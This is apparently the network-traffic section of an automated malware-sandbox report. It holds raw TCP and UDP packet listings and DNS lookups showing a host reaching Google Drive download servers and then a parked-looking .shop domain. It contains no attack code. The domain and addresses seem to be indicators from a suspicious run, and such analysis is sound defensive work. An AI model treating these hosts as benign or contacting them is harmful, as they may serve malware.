                                                                                        Dec 26, 2024 11:52:08.724456072 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.724494934 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.724503040 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740241051 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740293980 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.740302086 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740705013 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740750074 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.740757942 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.741502047 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.741545916 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.741554022 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.752815008 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.752886057 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.752892017 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.753232002 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.753278971 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.753285885 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754261971 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754291058 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754314899 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.754323959 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754368067 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.766252041 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.766702890 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.766741037 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.766748905 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.767617941 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.767658949 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.767666101 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776222944 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776272058 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.776283026 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776561975 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776599884 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776607990 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.776613951 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776647091 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.777463913 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.786938906 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.786987066 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.786993027 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.787427902 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.787472963 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.787480116 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.788413048 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.788455963 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.788463116 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.794166088 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.794217110 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.794224024 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.795341969 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.795387983 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.795397997 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.796226025 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.796268940 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.796277046 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.822580099 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.822626114 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.822633982 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.823025942 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.823071003 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.823077917 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.824074030 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.824115038 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.824122906 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.869726896 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.869738102 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.870481968 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.870538950 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.870549917 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.871381044 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.871428013 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.871433973 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.872255087 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.872302055 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.872312069 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.873141050 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.873186111 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.873193026 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.874111891 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.874155998 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.874162912 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.875021935 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.875063896 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.875070095 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.875984907 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.876029968 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.876036882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.877628088 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.877672911 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.877680063 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.878447056 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.878490925 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.878499031 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.879554987 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.879599094 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.879606009 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.880266905 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.880320072 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.880326033 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.882129908 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.882174969 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.882181883 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.882544041 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.882587910 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.882595062 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.883336067 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.883380890 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.883394003 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.892517090 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.892568111 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.892575026 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.892904043 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.892952919 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.892960072 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.893959045 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.894004107 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.894011021 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.906519890 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.906563997 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.906570911 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.906987906 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.907033920 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.907041073 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.907916069 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.907970905 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.907979012 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.922467947 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.922509909 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.922518015 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.922763109 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.922804117 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.922811031 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.923572063 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.923619032 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.923625946 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.933666945 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.933712959 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.933721066 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.934104919 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.934145927 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.934153080 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.935106993 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.935156107 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.935163975 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.950738907 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.950793982 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.950799942 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.951195955 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.951240063 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.951247931 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.952032089 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.952075005 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.952081919 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.963609934 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.963655949 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.963661909 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.963902950 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.963953018 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.963959932 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.964901924 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.964943886 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.964951038 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.976830959 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.976887941 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.976896048 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.977375031 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.977420092 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.977427006 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.978360891 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.978406906 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.978414059 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.986699104 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.986740112 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.986747026 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.987046003 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.987091064 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.987097025 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.987912893 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.987956047 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.987965107 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.998126030 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.998153925 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.998167992 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.998176098 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.998218060 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.998625994 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.999424934 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.999465942 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.999474049 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.004888058 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.004959106 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.004966974 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.005300999 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.005348921 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.005356073 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.006918907 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.006967068 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.006973982 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.033147097 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.033204079 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.033216000 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.033608913 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.033657074 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.033663988 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.034507036 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.034562111 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.034569025 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.076720953 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.089955091 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.090102911 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.090133905 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.090147018 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.090156078 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.090200901 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.091362000 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.092302084 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.092343092 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.092350960 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.093106985 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.093161106 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.093168020 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.093899012 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.093946934 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.093959093 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.095557928 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.095607996 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.095616102 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.095993996 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.096021891 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.096039057 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.096046925 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.096077919 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.096638918 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.097723007 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.097752094 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.097764015 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.097780943 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.097816944 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.098484039 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.099446058 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.099483967 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.099492073 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.100475073 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.100517035 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.100524902 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.101659060 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.101697922 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.101705074 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.102920055 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.102961063 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.102968931 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.103611946 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.103652954 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.103661060 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.104517937 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.104556084 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.104563951 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.105418921 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.105457067 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.105464935 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117343903 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117404938 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.117413998 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117679119 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117731094 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.117738008 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.120812893 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.120862007 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.120870113 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136826992 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136867046 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136876106 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.136884928 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136940956 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.137729883 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.138484955 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.138528109 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.138535976 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.147721052 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.147762060 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.147770882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148236990 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148241997 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148269892 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148282051 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148292065 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148299932 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148303986 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:53:06.960788965 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.080734968 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:07.080816984 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.091793060 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.211474895 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269448996 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269510984 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269568920 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269716978 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.269716978 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.272685051 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.392226934 CET8049756199.59.243.227192.168.2.4

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 26, 2024 11:51:59.920150042 CET5198053192.168.2.41.1.1.1
                                                                                        Dec 26, 2024 11:52:00.058281898 CET53519801.1.1.1192.168.2.4
                                                                                        Dec 26, 2024 11:52:02.797939062 CET6211353192.168.2.41.1.1.1
                                                                                        Dec 26, 2024 11:52:02.936117887 CET53621131.1.1.1192.168.2.4
                                                                                        Dec 26, 2024 11:53:06.388422012 CET5523053192.168.2.41.1.1.1
                                                                                        Dec 26, 2024 11:53:06.948565006 CET53552301.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 26, 2024 11:51:59.920150042 CET192.168.2.41.1.1.10x7fd6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 26, 2024 11:52:02.797939062 CET192.168.2.41.1.1.10xb3e4Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 26, 2024 11:53:06.388422012 CET192.168.2.41.1.1.10xf013Standard query (0)www.bellhomehd.shopA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 26, 2024 11:52:00.058281898 CET1.1.1.1192.168.2.40x7fd6No error (0)drive.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                        Dec 26, 2024 11:52:02.936117887 CET1.1.1.1192.168.2.40xb3e4No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                        Dec 26, 2024 11:53:06.948565006 CET1.1.1.1192.168.2.40xf013No error (0)www.bellhomehd.shop94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 26, 2024 11:53:06.948565006 CET1.1.1.1192.168.2.40xf013No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • drive.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • www.bellhomehd.shop

                                                                                        HTTP Packets

